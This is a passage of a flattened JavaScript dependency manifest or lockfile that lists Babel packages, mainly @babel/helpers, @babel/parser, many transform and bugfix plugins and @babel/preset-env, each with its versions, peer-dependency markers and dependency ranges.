7.28.3 @babel/template@^7.27.2 @babel/traverse@^7.28.3 @babel/types@^7.28.2 @babel/helpers 7.6.0 @babel/template@^7.6.0 @babel/traverse@^7.6.0 @babel/types@^7.6.0 7.6.2 @babel/template@^7.6.0 @babel/traverse@^7.6.2 @babel/types@^7.6.0 7.7.0 @babel/template@^7.7.0 @babel/traverse@^7.7.0 @babel/types@^7.7.0 7.7.4 @babel/template@^7.7.4 @babel/traverse@^7.7.4 @babel/types@^7.7.4 7.8.0 @babel/template@^7.8.0 @babel/traverse@^7.8.0 @babel/types@^7.8.0 7.8.3 @babel/template@^7.8.3 @babel/traverse@^7.8.3 @babel/types@^7.8.3 7.8.4 @babel/template@^7.8.3 @babel/traverse@^7.8.4 @babel/types@^7.8.3 7.9.0 @babel/template@^7.8.3 @babel/traverse@^7.9.0 @babel/types@^7.9.0 7.9.2 @babel/template@^7.8.3 @babel/traverse@^7.9.0 @babel/types@^7.9.0 7.9.6 @babel/template@^7.8.3 @babel/traverse@^7.9.6 
@babel/types@^7.9.6 7.10.0 @babel/template@^7.10.0 @babel/traverse@^7.10.0 @babel/types@^7.10.0 7.10.1 @babel/template@^7.10.1 @babel/traverse@^7.10.1 @babel/types@^7.10.1 7.10.4 @babel/template@^7.10.4 @babel/traverse@^7.10.4 @babel/types@^7.10.4 7.12.1 @babel/template@^7.10.4 @babel/traverse@^7.12.1 @babel/types@^7.12.1 7.12.5 @babel/template@^7.10.4 @babel/traverse@^7.12.5 @babel/types@^7.12.5 7.12.13 @babel/template@^7.12.13 @babel/traverse@^7.12.13 @babel/types@^7.12.13 7.12.17 @babel/template@^7.12.13 @babel/traverse@^7.12.17 @babel/types@^7.12.17 7.13.0 @babel/template@^7.12.13 @babel/traverse@^7.13.0 @babel/types@^7.13.0 7.13.10 @babel/template@^7.12.13 @babel/traverse@^7.13.0 @babel/types@^7.13.0 7.13.16 @babel/template@^7.12.13 @babel/traverse@^7.13.15 @babel/types@^7.13.16 7.13.17 @babel/template@^7.12.13 @babel/traverse@^7.13.17 @babel/types@^7.13.17 7.14.0 @babel/template@^7.12.13 @babel/traverse@^7.14.0 @babel/types@^7.14.0 7.14.5 @babel/template@^7.14.5 @babel/traverse@^7.14.5 @babel/types@^7.14.5 7.14.6 @babel/template@^7.14.5 @babel/traverse@^7.14.5 @babel/types@^7.14.5 7.14.8 @babel/template@^7.14.5 @babel/traverse@^7.14.8 @babel/types@^7.14.8 7.15.3 @babel/template@^7.14.5 @babel/traverse@^7.15.0 @babel/types@^7.15.0 7.15.4 @babel/template@^7.15.4 @babel/traverse@^7.15.4 @babel/types@^7.15.4 7.16.0 @babel/template@^7.16.0 @babel/traverse@^7.16.0 @babel/types@^7.16.0 7.16.3 @babel/template@^7.16.0 @babel/traverse@^7.16.3 @babel/types@^7.16.0 7.16.5 @babel/template@^7.16.0 @babel/traverse@^7.16.5 @babel/types@^7.16.0 7.16.7 @babel/template@^7.16.7 @babel/traverse@^7.16.7 @babel/types@^7.16.7 7.17.0 @babel/template@^7.16.7 @babel/traverse@^7.17.0 @babel/types@^7.17.0 7.17.2 @babel/template@^7.16.7 @babel/traverse@^7.17.0 @babel/types@^7.17.0 7.17.7 @babel/template@^7.16.7 @babel/traverse@^7.17.3 @babel/types@^7.17.0 7.17.8 @babel/template@^7.16.7 @babel/traverse@^7.17.3 @babel/types@^7.17.0 7.17.9 @babel/template@^7.16.7 @babel/traverse@^7.17.9 
@babel/types@^7.17.0 7.18.0 @babel/template@^7.16.7 @babel/traverse@^7.18.0 @babel/types@^7.18.0 7.18.2 @babel/template@^7.16.7 @babel/traverse@^7.18.2 @babel/types@^7.18.2 7.18.6 @babel/template@^7.18.6 @babel/traverse@^7.18.6 @babel/types@^7.18.6 7.18.9 @babel/template@^7.18.6 @babel/traverse@^7.18.9 @babel/types@^7.18.9 7.19.0 @babel/template@^7.18.10 @babel/traverse@^7.19.0 @babel/types@^7.19.0 7.19.4 @babel/template@^7.18.10 @babel/traverse@^7.19.4 @babel/types@^7.19.4 7.20.0 @babel/template@^7.18.10 @babel/traverse@^7.20.0 @babel/types@^7.20.0 7.20.1 @babel/template@^7.18.10 @babel/traverse@^7.20.1 @babel/types@^7.20.0 7.20.5 @babel/template@^7.18.10 @babel/traverse@^7.20.5 @babel/types@^7.20.5 7.20.6 @babel/template@^7.18.10 @babel/traverse@^7.20.5 @babel/types@^7.20.5 7.20.7 @babel/template@^7.20.7 @babel/traverse@^7.20.7 @babel/types@^7.20.7 7.20.13 @babel/template@^7.20.7 @babel/traverse@^7.20.13 @babel/types@^7.20.7 7.21.0 @babel/template@^7.20.7 @babel/traverse@^7.21.0 @babel/types@^7.21.0 7.21.5 @babel/template@^7.20.7 @babel/traverse@^7.21.5 @babel/types@^7.21.5 7.22.0 @babel/template@^7.21.9 @babel/traverse@^7.22.0 @babel/types@^7.22.0 7.22.3 @babel/template@^7.21.9 @babel/traverse@^7.22.1 @babel/types@^7.22.3 7.22.5 @babel/template@^7.22.5 @babel/traverse@^7.22.5 @babel/types@^7.22.5 7.22.6 @babel/template@^7.22.5 @babel/traverse@^7.22.6 @babel/types@^7.22.5 7.22.10 @babel/template@^7.22.5 @babel/traverse@^7.22.10 @babel/types@^7.22.10 7.22.11 @babel/template@^7.22.5 @babel/traverse@^7.22.11 @babel/types@^7.22.11 7.22.15 @babel/template@^7.22.15 @babel/traverse@^7.22.15 @babel/types@^7.22.15 7.23.0 @babel/template@^7.22.15 @babel/traverse@^7.23.0 @babel/types@^7.23.0 7.23.1 @babel/template@^7.22.15 @babel/traverse@^7.23.0 @babel/types@^7.23.0 7.23.2 @babel/template@^7.22.15 @babel/traverse@^7.23.2 @babel/types@^7.23.0 7.23.4 @babel/template@^7.22.15 @babel/traverse@^7.23.4 @babel/types@^7.23.4 7.23.5 @babel/template@^7.22.15 @babel/traverse@^7.23.5 
@babel/types@^7.23.5 7.23.6 @babel/template@^7.22.15 @babel/traverse@^7.23.6 @babel/types@^7.23.6 7.23.7 @babel/template@^7.22.15 @babel/traverse@^7.23.7 @babel/types@^7.23.6 7.23.8 @babel/template@^7.22.15 @babel/traverse@^7.23.7 @babel/types@^7.23.6 7.23.9 @babel/template@^7.23.9 @babel/traverse@^7.23.9 @babel/types@^7.23.9 7.24.0 @babel/template@^7.24.0 @babel/traverse@^7.24.0 @babel/types@^7.24.0 7.24.1 @babel/template@^7.24.0 @babel/traverse@^7.24.1 @babel/types@^7.24.0 7.24.4 @babel/template@^7.24.0 @babel/traverse@^7.24.1 @babel/types@^7.24.0 7.24.5 @babel/template@^7.24.0 @babel/traverse@^7.24.5 @babel/types@^7.24.5 7.24.6 @babel/template@^7.24.6 @babel/types@^7.24.6 7.24.7 @babel/template@^7.24.7 @babel/types@^7.24.7 7.24.8 @babel/template@^7.24.7 @babel/types@^7.24.8 7.25.0 @babel/template@^7.25.0 @babel/types@^7.25.0 7.25.6 @babel/template@^7.25.0 @babel/types@^7.25.6 7.25.7 @babel/template@^7.25.7 @babel/types@^7.25.7 7.25.9 @babel/template@^7.25.9 @babel/types@^7.25.9 7.26.0 @babel/template@^7.25.9 @babel/types@^7.26.0 7.26.7 @babel/template@^7.25.9 @babel/types@^7.26.7 7.26.9 @babel/template@^7.26.9 @babel/types@^7.26.9 7.26.10 @babel/template@^7.26.9 @babel/types@^7.26.10 7.27.0 @babel/template@^7.27.0 @babel/types@^7.27.0 7.27.1 @babel/template@^7.27.1 @babel/types@^7.27.1 7.27.3 @babel/template@^7.27.2 @babel/types@^7.27.3 7.27.4 @babel/template@^7.27.2 @babel/types@^7.27.3 7.27.6 @babel/template@^7.27.2 @babel/types@^7.27.6 7.28.2 @babel/template@^7.27.2 @babel/types@^7.28.2 7.28.3 @babel/template@^7.27.2 @babel/types@^7.28.2 7.28.4 @babel/template@^7.27.2 @babel/types@^7.28.4 @babel/highlight 7.0.0 chalk@^2.0.0 esutils@^2.0.2 js-tokens@^4.0.0 @babel/parser 7.1.2 7.6.0 7.28.5 @babel/types@^7.28.5 @babel/plugin-bugfix-firefox-class-in-computed-class-key 7.28.5 Scope peer|@babel/core@^7.0.0 @babel/helper-plugin-utils@^7.27.1 @babel/traverse@^7.28.5 @babel/plugin-bugfix-safari-class-field-initializer-scope 7.27.1 Scope peer|@babel/core@^7.0.0 
@babel/helper-plugin-utils@^7.27.1 @babel/plugin-bugfix-safari-id-destructuring-collision-in-function-expression 7.27.1 Scope peer|@babel/core@^7.0.0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-bugfix-v8-spread-parameters-in-optional-chaining 7.27.1 Scope peer|@babel/core@^7.13.0 @babel/helper-plugin-utils@^7.27.1 @babel/helper-skip-transparent-expression-wrappers@^7.27.1 @babel/plugin-transform-optional-chaining@^7.27.1 @babel/plugin-bugfix-v8-static-class-fields-redefine-readonly 7.28.3 Scope peer|@babel/core@^7.0.0 @babel/helper-plugin-utils@^7.27.1 @babel/traverse@^7.28.3 @babel/plugin-proposal-async-generator-functions 7.2.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 @babel/helper-remap-async-to-generator@^7.1.0 @babel/plugin-syntax-async-generators@^7.2.0 @babel/plugin-proposal-dynamic-import 7.5.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 @babel/plugin-syntax-dynamic-import@^7.2.0 @babel/plugin-proposal-json-strings 7.2.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 @babel/plugin-syntax-json-strings@^7.2.0 @babel/plugin-proposal-object-rest-spread 7.5.5 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 @babel/plugin-syntax-object-rest-spread@^7.2.0 @babel/plugin-proposal-optional-catch-binding 7.2.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 @babel/plugin-syntax-optional-catch-binding@^7.2.0 @babel/plugin-proposal-private-property-in-object 7.21.0-placeholder-for-preset-env.2 Scope peer|@babel/core@^7.0.0-0 @babel/plugin-proposal-unicode-property-regex 7.4.4 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 @babel/helper-regex@^7.4.4 regexpu-core@^4.5.4 @babel/plugin-syntax-async-generators 7.2.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 @babel/plugin-syntax-dynamic-import 7.2.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 @babel/plugin-syntax-import-assertions 7.27.1 Scope 
peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-syntax-import-attributes 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-syntax-json-strings 7.2.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 @babel/plugin-syntax-object-rest-spread 7.2.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 @babel/plugin-syntax-optional-catch-binding 7.2.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 @babel/plugin-syntax-unicode-sets-regex 7.18.6 Scope peer|@babel/core@^7.0.0 @babel/helper-create-regexp-features-plugin@^7.18.6 @babel/helper-plugin-utils@^7.18.6 @babel/plugin-transform-arrow-functions 7.2.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-async-generator-functions 7.28.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/helper-remap-async-to-generator@^7.27.1 @babel/traverse@^7.28.0 @babel/plugin-transform-async-to-generator 7.5.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-module-imports@^7.0.0 @babel/helper-plugin-utils@^7.0.0 @babel/helper-remap-async-to-generator@^7.1.0 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-module-imports@^7.27.1 @babel/helper-plugin-utils@^7.27.1 @babel/helper-remap-async-to-generator@^7.27.1 @babel/plugin-transform-block-scoped-functions 7.2.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-block-scoping 7.6.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 lodash@^4.17.13 7.28.5 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-class-properties 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-create-class-features-plugin@^7.27.1 @babel/helper-plugin-utils@^7.27.1 
@babel/plugin-transform-class-static-block 7.28.3 Scope peer|@babel/core@^7.12.0 @babel/helper-create-class-features-plugin@^7.28.3 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-classes 7.5.5 Scope peer|@babel/core@^7.0.0-0 @babel/helper-annotate-as-pure@^7.0.0 @babel/helper-define-map@^7.5.5 @babel/helper-function-name@^7.1.0 @babel/helper-optimise-call-expression@^7.0.0 @babel/helper-plugin-utils@^7.0.0 @babel/helper-replace-supers@^7.5.5 @babel/helper-split-export-declaration@^7.4.4 globals@^11.1.0 7.28.4 Scope peer|@babel/core@^7.0.0-0 @babel/helper-annotate-as-pure@^7.27.3 @babel/helper-compilation-targets@^7.27.2 @babel/helper-globals@^7.28.0 @babel/helper-plugin-utils@^7.27.1 @babel/helper-replace-supers@^7.27.1 @babel/traverse@^7.28.4 @babel/plugin-transform-computed-properties 7.2.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/template@^7.27.1 @babel/plugin-transform-destructuring 7.6.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 7.28.5 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/traverse@^7.28.5 @babel/plugin-transform-dotall-regex 7.4.4 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 @babel/helper-regex@^7.4.4 regexpu-core@^4.5.4 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-create-regexp-features-plugin@^7.27.1 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-duplicate-keys 7.5.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-duplicate-named-capturing-groups-regex 7.27.1 Scope peer|@babel/core@^7.0.0 @babel/helper-create-regexp-features-plugin@^7.27.1 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-dynamic-import 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 
@babel/plugin-transform-explicit-resource-management 7.28.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-destructuring@^7.28.0 @babel/plugin-transform-exponentiation-operator 7.2.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-builder-binary-assignment-operator-visitor@^7.1.0 @babel/helper-plugin-utils@^7.0.0 7.28.5 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-export-namespace-from 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-for-of 7.4.4 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/helper-skip-transparent-expression-wrappers@^7.27.1 @babel/plugin-transform-function-name 7.4.4 Scope peer|@babel/core@^7.0.0-0 @babel/helper-function-name@^7.1.0 @babel/helper-plugin-utils@^7.0.0 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-compilation-targets@^7.27.1 @babel/helper-plugin-utils@^7.27.1 @babel/traverse@^7.27.1 @babel/plugin-transform-json-strings 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-literals 7.2.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-logical-assignment-operators 7.28.5 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-member-expression-literals 7.2.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-modules-amd 7.5.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-module-transforms@^7.1.0 @babel/helper-plugin-utils@^7.0.0 babel-plugin-dynamic-import-node@^2.3.0 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-module-transforms@^7.27.1 @babel/helper-plugin-utils@^7.27.1 
@babel/plugin-transform-modules-commonjs 7.6.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-module-transforms@^7.4.4 @babel/helper-plugin-utils@^7.0.0 @babel/helper-simple-access@^7.1.0 babel-plugin-dynamic-import-node@^2.3.0 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-module-transforms@^7.27.1 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-modules-systemjs 7.5.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-hoist-variables@^7.4.4 @babel/helper-plugin-utils@^7.0.0 babel-plugin-dynamic-import-node@^2.3.0 7.28.5 Scope peer|@babel/core@^7.0.0-0 @babel/helper-module-transforms@^7.28.3 @babel/helper-plugin-utils@^7.27.1 @babel/helper-validator-identifier@^7.28.5 @babel/traverse@^7.28.5 @babel/plugin-transform-modules-umd 7.2.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-module-transforms@^7.1.0 @babel/helper-plugin-utils@^7.0.0 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-module-transforms@^7.27.1 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-named-capturing-groups-regex 7.6.0 Scope peer|@babel/core@^7.0.0 regexp-tree@^0.1.13 7.27.1 Scope peer|@babel/core@^7.0.0 @babel/helper-create-regexp-features-plugin@^7.27.1 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-new-target 7.4.4 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-nullish-coalescing-operator 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-numeric-separator 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-object-rest-spread 7.28.4 Scope peer|@babel/core@^7.0.0-0 @babel/helper-compilation-targets@^7.27.2 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-destructuring@^7.28.0 @babel/plugin-transform-parameters@^7.27.7 @babel/traverse@^7.28.4 @babel/plugin-transform-object-super 7.5.5 Scope peer|@babel/core@^7.0.0-0 
@babel/helper-plugin-utils@^7.0.0 @babel/helper-replace-supers@^7.5.5 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/helper-replace-supers@^7.27.1 @babel/plugin-transform-optional-catch-binding 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-optional-chaining 7.28.5 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/helper-skip-transparent-expression-wrappers@^7.27.1 @babel/plugin-transform-parameters 7.4.4 Scope peer|@babel/core@^7.0.0-0 @babel/helper-call-delegate@^7.4.4 @babel/helper-get-function-arity@^7.0.0 @babel/helper-plugin-utils@^7.0.0 7.27.7 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-private-methods 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-create-class-features-plugin@^7.27.1 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-private-property-in-object 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-annotate-as-pure@^7.27.1 @babel/helper-create-class-features-plugin@^7.27.1 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-property-literals 7.2.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-regenerator 7.4.5 Scope peer|@babel/core@^7.0.0-0 regenerator-transform@^0.14.0 7.28.4 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-regexp-modifiers 7.27.1 Scope peer|@babel/core@^7.0.0 @babel/helper-create-regexp-features-plugin@^7.27.1 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-reserved-words 7.2.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-shorthand-properties 7.2.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 7.27.1 Scope peer|@babel/core@^7.0.0-0 
@babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-spread 7.2.2 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/helper-skip-transparent-expression-wrappers@^7.27.1 @babel/plugin-transform-sticky-regex 7.2.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 @babel/helper-regex@^7.0.0 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-template-literals 7.4.4 Scope peer|@babel/core@^7.0.0-0 @babel/helper-annotate-as-pure@^7.0.0 @babel/helper-plugin-utils@^7.0.0 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-typeof-symbol 7.2.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-unicode-escapes 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-unicode-property-regex 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-create-regexp-features-plugin@^7.27.1 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-unicode-regex 7.4.4 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 @babel/helper-regex@^7.4.4 regexpu-core@^4.5.4 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-create-regexp-features-plugin@^7.27.1 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-unicode-sets-regex 7.27.1 Scope peer|@babel/core@^7.0.0 @babel/helper-create-regexp-features-plugin@^7.27.1 @babel/helper-plugin-utils@^7.27.1 @babel/preset-env 7.6.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-module-imports@^7.0.0 @babel/helper-plugin-utils@^7.0.0 @babel/plugin-proposal-async-generator-functions@^7.2.0 @babel/plugin-proposal-dynamic-import@^7.5.0 @babel/plugin-proposal-json-strings@^7.2.0 @babel/plugin-proposal-object-rest-spread@^7.5.5 @babel/plugin-proposal-optional-catch-binding@^7.2.0 
@babel/plugin-proposal-unicode-property-regex@^7.4.4 @babel/plugin-syntax-async-generators@^7.2.0 @babel/plugin-syntax-dynamic-import@^7.2.0 @babel/plugin-syntax-json-strings@^7.2.0 @babel/plugin-syntax-object-rest-spread@^7.2.0 @babel/plugin-syntax-optional-catch-binding@^7.2.0 @babel/plugin-transform-arrow-functions@^7.2.0 @babel/plugin-transform-async-to-generator@^7.5.0 @babel/plugin-transform-block-scoped-functions@^7.2.0 @babel/plugin-transform-block-scoping@^7.6.0 @babel/plugin-transform-classes@^7.5.5 @babel/plugin-transform-computed-properties@^7.2.0 @babel/plugin-transform-destructuring@^7.6.0 @babel/plugin-transform-dotall-regex@^7.4.4 @babel/plugin-transform-duplicate-keys@^7.5.0 @babel/plugin-transform-exponentiation-operator@^7.2.0 @babel/plugin-transform-for-of@^7.4.4 @babel/plugin-transform-function-name@^7.4.4 @babel/plugin-transform-literals@^7.2.0 @babel/plugin-transform-member-expression-literals@^7.2.0 @babel/plugin-transform-modules-amd@^7.5.0 @babel/plugin-transform-modules-commonjs@^7.6.0 @babel/plugin-transform-modules-systemjs@^7.5.0 @babel/plugin-transform-modules-umd@^7.2.0 @babel/plugin-transform-named-capturing-groups-regex@^7.6.0 @babel/plugin-transform-new-target@^7.4.4 @babel/plugin-transform-object-super@^7.5.5 @babel/plugin-transform-parameters@^7.4.4 @babel/plugin-transform-property-literals@^7.2.0 @babel/plugin-transform-regenerator@^7.4.5 @babel/plugin-transform-reserved-words@^7.2.0 @babel/plugin-transform-shorthand-properties@^7.2.0 @babel/plugin-transform-spread@^7.2.0 @babel/plugin-transform-sticky-regex@^7.2.0 @babel/plugin-transform-template-literals@^7.4.4 @babel/plugin-transform-typeof-symbol@^7.2.0 @babel/plugin-transform-unicode-regex@^7.4.4 @babel/types@^7.6.0 browserslist@^4.6.0 core-js-compat@^3.1.1 invariant@^2.2.2 js-levenshtein@^1.1.3 semver@^5.5.0 7.28.5 @babel/compat-data@^7.28.5 Scope peer|@babel/core@^7.0.0-0 @babel/helper-compilation-targets@^7.27.2 @babel/helper-plugin-utils@^7.27.1 
@babel/helper-validator-option@^7.27.1 @babel/plugin-bugfix-firefox-class-in-computed-class-key@^7.28.5 @babel/plugin-bugfix-safari-class-field-initializer-scope@^7.27.1 @babel/plugin-bugfix-safari-id-destructuring-collision-in-function-expression@^7.27.1 @babel/plugin-bugfix-v8-spread-parameters-in-optional-chaining@^7.27.1 @babel/plugin-bugfix-v8-static-class-fields-redefine-readonly@^7.28.3 @babel/plugin-proposal-private-property-in-object@7.21.0-placeholder-for-preset-env.2 @babel/plugin-syntax-import-assertions@^7.27.1 @babel/plugin-syntax-import-attributes@^7.27.1 @babel/plugin-syntax-unicode-sets-regex@^7.18.6 @babel/plugin-transform-arrow-functions@^7.27.1 @babel/plugin-transform-async-generator-functions@^7.28.0 @babel/plugin-transform-async-to-generator@^7.27.1 @babel/plugin-transform-block-scoped-functions@^7.27.1 @babel/plugin-transform-block-scoping@^7.28.5 @babel/plugin-transform-class-properties@^7.27.1 @babel/plugin-transform-class-static-block@^7.28.3 @babel/plugin-transform-classes@^7.28.4 @babel/plugin-transform-computed-properties@^7.27.1 @babel/plugin-transform-destructuring@^7.28.5 @babel/plugin-transform-dotall-regex@^7.27.1 @babel/plugin-transform-duplicate-keys@^7.27.1 @babel/plugin-transform-duplicate-named-capturing-groups-regex@^7.27.1 @babel/plugin-transform-dynamic-import@^7.27.1 @babel/plugin-transform-explicit-resource-management@^7.28.0 @babel/plugin-transform-exponentiation-operator@^7.28.5 @babel/plugin-transform-export-namespace-from@^7.27.1 @babel/plugin-transform-for-of@^7.27.1 @babel/plugin-transform-function-name@^7.27.1 @babel/plugin-transform-json-strings@^7.27.1 @babel/plugin-transform-literals@^7.27.1 @babel/plugin-transform-logical-assignment-operators@^7.28.5 @babel/plugin-transform-member-expression-literals@^7.27.1 @babel/plugin-transform-modules-amd@^7.27.1 @babel/plugin-transform-modules-commonjs@^7.27.1 @babel/plugin-transform-modules-systemjs@^7.28.5 @babel/plugin-transform-modules-umd@^7.27.1 
@babel/plugin-transform-named-capturing-groups-regex@^7.27.1 @babel/plugin-transform-new-target@^7.27.1 @babel/plugin-transform-nullish-coalescing-operator@^7.27.1 @babel/plugin-transform-numeric-separator@^7.27.1 @babel/plugin-transform-object-rest-spread@^7.28.4 @babel/plugin-transform-object-super@^7.27.1 @babel/plugin-transform-optional-catch-binding@^7.27.1 @babel/plugin-transform-optional-chaining@^7.28.5 @babel/plugin-transform-parameters@^7.27.7 @babel/plugin-transform-private-methods@^7.27.1 @babel/plugin-transform-private-property-in-object@^7.27.1 @babel/plugin-transform-property-literals@^7.27.1 @babel/plugin-transform-regenerator@^7.28.4 @babel/plugin-transform-regexp-modifiers@^7.27.1 @babel/plugin-transform-reserved-words@^7.27.1 @babel/plugin-transform-shorthand-properties@^7.27.1 @babel/plugin-transform-spread@^7.27.1 @babel/plugin-transform-sticky-regex@^7.27.1 @babel/plugin-transform-template-literals@^7.27.1 @babel/plugin-transform-typeof-symbol@^7.27.1 @babel/plugin-transform-unicode-escapes@^7.27.1 @babel/plugin-transform-unicode-property-regex@^7.27.1 @babel/plugin-transform-unicode-regex@^7.27.1 @babel/plugin-transform-unicode-sets-regex@^7.27.1 @babel/preset-modules@0.1.6-no-external-plugins babel-plugin-polyfill-corejs2@^0.4.14 babel-plugin-polyfill-corejs3@^0.13.0 babel-plugin-polyfill-regenerator@^0.6.5 core-js-compat@^3.43.0 semver@^6.3.1 